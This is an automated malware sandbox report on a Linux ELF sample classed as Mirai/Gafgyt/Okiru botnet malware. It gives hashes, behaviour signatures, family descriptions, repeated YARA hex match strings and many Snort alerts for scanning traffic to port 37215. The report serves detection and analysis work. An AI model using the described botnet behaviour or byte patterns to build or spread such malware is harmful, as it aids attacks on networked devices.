Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
KlgUGKamBf.elf

Overview

General Information

Sample name:KlgUGKamBf.elf
renamed because original name is a hash value
Original sample name:2ce7f9b1c5f2f9bb05180465a8de74e8.elf
Analysis ID:1448335
MD5:2ce7f9b1c5f2f9bb05180465a8de74e8
SHA1:7b8a1a6adee4cffaf812f693eff98a786461fe75
SHA256:850ca89c53804ddc86474891ac3dc273c2b09573045b4bedcdf99a5a85c1417d
Tags:64elfgafgyt
Infos:

Detection

Mirai, Gafgyt, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Gafgyt
Yara detected Mirai
Yara detected Okiru
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1448335
Start date and time:2024-05-28 08:58:22 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 16s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:KlgUGKamBf.elf
renamed because original name is a hash value
Original Sample Name:2ce7f9b1c5f2f9bb05180465a8de74e8.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@3/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: KlgUGKamBf.elf
Command:/tmp/KlgUGKamBf.elf
PID:6207
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 6214, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 6214, Parent: 1477, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • xfdesktop (PID: 6218, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • xfdesktop (PID: 6221, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • xfdesktop (PID: 6227, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • xfdesktop (PID: 6230, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • xfdesktop (PID: 6233, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
SourceRuleDescriptionAuthorStrings
KlgUGKamBf.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    KlgUGKamBf.elfJoeSecurity_OkiruYara detected OkiruJoe Security
      KlgUGKamBf.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        KlgUGKamBf.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          KlgUGKamBf.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x19380:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19394:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1940c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19420:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19434:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19448:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1945c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19470:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19484:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19498:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19510:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          6207.1.0000000000400000.000000000041d000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
            6207.1.0000000000400000.000000000041d000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
              6207.1.0000000000400000.000000000041d000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
                6207.1.0000000000400000.000000000041d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                  6207.1.0000000000400000.000000000041d000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
                  • 0x19380:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19394:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x193a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x193bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x193d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x193e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x193f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x1940c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19420:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19434:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19448:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x1945c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19470:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19484:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19498:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x194ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x194c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x194d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x194e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x194fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19510:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  Click to see the 20 entries
                  Timestamp:05/28/24-08:59:10.543163
                  SID:2835222
                  Source Port:43576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657687
                  SID:2829579
                  Source Port:47178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591348
                  SID:2829579
                  Source Port:58986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907950
                  SID:2829579
                  Source Port:57468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.887054
                  SID:2829579
                  Source Port:56620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279400
                  SID:2835222
                  Source Port:40466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.683047
                  SID:2829579
                  Source Port:45836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627958
                  SID:2829579
                  Source Port:36858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911551
                  SID:2829579
                  Source Port:60488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769256
                  SID:2835222
                  Source Port:40904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576131
                  SID:2835222
                  Source Port:49526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.888381
                  SID:2829579
                  Source Port:39136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312551
                  SID:2835222
                  Source Port:53688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622207
                  SID:2829579
                  Source Port:55392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660538
                  SID:2835222
                  Source Port:42192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806398
                  SID:2829579
                  Source Port:57336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.605911
                  SID:2829579
                  Source Port:55884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742324
                  SID:2835222
                  Source Port:55300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563541
                  SID:2835222
                  Source Port:37584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627950
                  SID:2835222
                  Source Port:38280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493240
                  SID:2835222
                  Source Port:40194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930174
                  SID:2829579
                  Source Port:52216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649555
                  SID:2835222
                  Source Port:44482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.544620
                  SID:2835222
                  Source Port:55266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844943
                  SID:2829579
                  Source Port:37220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.916846
                  SID:2835222
                  Source Port:39390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316510
                  SID:2835222
                  Source Port:54176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.880010
                  SID:2829579
                  Source Port:56076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490398
                  SID:2835222
                  Source Port:47936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585328
                  SID:2835222
                  Source Port:47584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628503
                  SID:2829579
                  Source Port:59642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550567
                  SID:2835222
                  Source Port:55290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.523610
                  SID:2835222
                  Source Port:60388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.765436
                  SID:2829579
                  Source Port:47864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766522
                  SID:2829579
                  Source Port:40044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.323478
                  SID:2829579
                  Source Port:40718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678830
                  SID:2835222
                  Source Port:47232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489339
                  SID:2829579
                  Source Port:50080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578051
                  SID:2829579
                  Source Port:38924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.590454
                  SID:2829579
                  Source Port:33824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695760
                  SID:2829579
                  Source Port:52700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628405
                  SID:2835222
                  Source Port:49260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912547
                  SID:2835222
                  Source Port:52400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591031
                  SID:2835222
                  Source Port:36674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659985
                  SID:2829579
                  Source Port:59514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673600
                  SID:2835222
                  Source Port:36682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529980
                  SID:2835222
                  Source Port:41522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664842
                  SID:2829579
                  Source Port:47248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604038
                  SID:2829579
                  Source Port:43072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319110
                  SID:2835222
                  Source Port:56236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770937
                  SID:2835222
                  Source Port:38234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655670
                  SID:2835222
                  Source Port:58910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488807
                  SID:2829579
                  Source Port:59470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601611
                  SID:2835222
                  Source Port:37636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.864999
                  SID:2835222
                  Source Port:33256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678621
                  SID:2835222
                  Source Port:40296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300194
                  SID:2835222
                  Source Port:38690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542566
                  SID:2835222
                  Source Port:36050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529146
                  SID:2835222
                  Source Port:41926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664832
                  SID:2835222
                  Source Port:37188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.584840
                  SID:2835222
                  Source Port:46876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785803
                  SID:2835222
                  Source Port:45676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488163
                  SID:2835222
                  Source Port:40898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766639
                  SID:2829579
                  Source Port:43494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.283773
                  SID:2829579
                  Source Port:41620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911157
                  SID:2835222
                  Source Port:41858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543463
                  SID:2829579
                  Source Port:41314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885458
                  SID:2835222
                  Source Port:55852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.915656
                  SID:2835222
                  Source Port:38030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.932207
                  SID:2829579
                  Source Port:57308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584565
                  SID:2835222
                  Source Port:57182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296251
                  SID:2829579
                  Source Port:51646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492009
                  SID:2835222
                  Source Port:43944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.598910
                  SID:2829579
                  Source Port:37964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.290860
                  SID:2829579
                  Source Port:56952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661676
                  SID:2829579
                  Source Port:58374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846088
                  SID:2835222
                  Source Port:45566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.324218
                  SID:2829579
                  Source Port:58612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627796
                  SID:2829579
                  Source Port:49262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786447
                  SID:2829579
                  Source Port:44004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729727
                  SID:2829579
                  Source Port:32878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927192
                  SID:2835222
                  Source Port:33242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316527
                  SID:2835222
                  Source Port:56444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720226
                  SID:2829579
                  Source Port:41884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844951
                  SID:2835222
                  Source Port:41748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577061
                  SID:2829579
                  Source Port:55820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578931
                  SID:2835222
                  Source Port:45082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.589981
                  SID:2835222
                  Source Port:45768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.915708
                  SID:2835222
                  Source Port:57070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528865
                  SID:2829579
                  Source Port:52362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277975
                  SID:2829579
                  Source Port:34934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529307
                  SID:2829579
                  Source Port:38762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.593860
                  SID:2829579
                  Source Port:46398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628364
                  SID:2835222
                  Source Port:34570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555473
                  SID:2829579
                  Source Port:42964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651447
                  SID:2835222
                  Source Port:38818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888303
                  SID:2835222
                  Source Port:41242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793638
                  SID:2835222
                  Source Port:33038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696052
                  SID:2835222
                  Source Port:45304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788968
                  SID:2829579
                  Source Port:46098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790325
                  SID:2835222
                  Source Port:47096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.800752
                  SID:2835222
                  Source Port:49054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659264
                  SID:2835222
                  Source Port:46968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585335
                  SID:2829579
                  Source Port:49024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555516
                  SID:2829579
                  Source Port:46920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750018
                  SID:2835222
                  Source Port:49142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493612
                  SID:2829579
                  Source Port:34740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.701035
                  SID:2835222
                  Source Port:55842
                  Destination Port:37215
